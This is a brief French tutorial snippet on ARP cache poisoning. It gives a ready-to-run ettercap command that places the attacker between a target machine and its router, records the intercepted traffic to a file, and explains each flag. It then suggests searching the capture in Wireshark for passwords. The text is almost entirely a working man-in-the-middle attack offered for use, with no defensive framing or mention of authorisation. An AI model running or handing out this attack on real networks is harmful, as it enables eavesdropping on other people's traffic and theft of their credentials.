ARP Cache Poisoning

Voici un exemple d'utilisation d'ettercap pour faire du ARP Poisoning (mettre sudo devant pour ubuntu) :

ettercap -T -q -M arp:remote /192.168.1.101/ /192.168.1.1/ -w fichier_de_sortie

• -T : lance ettercap en mode texte
• -q : permet de ne pas afficher les requêtes dans le terminal
• -M : indique que l'on veut une attaque de type “Man in the middle”
• -w : enregistre le résultat de la capture dans un fichier
• 192.168.1.101 est la machine cible et 192.168.1.1 est le routeur de sortie

Ensuite on ouvre le fichier généré avec wireshark par exemple et on analyse à la recherche de mots de passe :)